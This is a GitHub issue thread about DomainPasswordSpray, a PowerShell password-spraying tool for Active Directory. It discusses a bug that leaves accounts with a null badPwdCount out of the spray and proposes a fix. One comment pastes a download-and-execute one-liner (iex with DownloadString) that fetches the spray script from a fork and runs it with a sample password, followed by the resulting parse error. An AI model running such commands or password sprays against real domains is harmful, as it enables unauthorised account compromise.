Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Users with badPwdCount = $null are excluded by default #27

Open
martinsohn opened this issue Jun 9, 2021 · 1 comment
Open

Users with badPwdCount = $null are excluded by default #27

martinsohn opened this issue Jun 9, 2021 · 1 comment

Comments

@martinsohn
Copy link

martinsohn commented Jun 9, 2021

This causes users that have badPwdCount = $null to be excluded from the password spray.
Is there a reason for this or just a mistake?

Value could for example be $null if:

  1. User never logged on
  2. User never typed password wrong
  3. We have 'deny read' on the attribute

The last one seems a bit dangerous to ignore.

Fix would be to add else statement, where $attemptsuntillockout is still checked but $observation_window is ignored.

bluecurby added a commit to bluecurby/DomainPasswordSpray that referenced this issue Aug 23, 2022
@moscowchill
Copy link

moscowchill commented Nov 28, 2023

`PS C:\Windows\System32\WindowsPowerShell\v1.0> iex ((New-Object System.Net.WebClient).DownloadString('https://raw.github
usercontent.com/bluecurby/DomainPasswordSpray/master/DomainPasswordSpray.ps1')); Invoke-DomainPasswordSpray -Password Zo
mer2023!
iex : At line:467 char:40
if($badcount -eq "null")
~
Missing statement block after if ( condition ).
At line:1 char:1
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercon ...

    CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    FullyQualifiedErrorId : MissingStatementBlock,Microsoft.PowerShell.Commands.InvokeExpressionCommand

lenhart pushed a commit to lenhart/DomainPasswordSpray that referenced this issue Feb 11, 2024
# for free to join this conversation on GitHub. Already have an account? # to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants